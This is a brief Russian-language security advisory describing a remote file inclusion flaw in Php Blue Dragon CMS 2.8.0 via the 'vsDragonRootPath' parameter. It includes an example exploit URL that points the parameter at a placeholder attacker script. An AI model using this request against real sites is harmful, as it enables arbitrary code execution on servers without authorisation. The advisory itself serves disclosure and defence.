Программа: Php Blue Dragon CMS 2.8.0, возможно другие версии.

Уязвимость позволяет удаленному пользователю
выполнить произвольный код на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в
параметре «vsDragonRootPath» в сценарии
public_includes/pub_popup/popup_finduser.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольный PHP сценарий
на целевой системе с привилегиями Web сервера. Для удачной эксплуатации
уязвимости опция «register_globals» должна быть включена. 

Пример:

http://www.site.com/[dragon_path]/public_includes/pub_popup/
popup_finduser.php?vsDragonRootPath=[evil_scripts]



Оставить мнение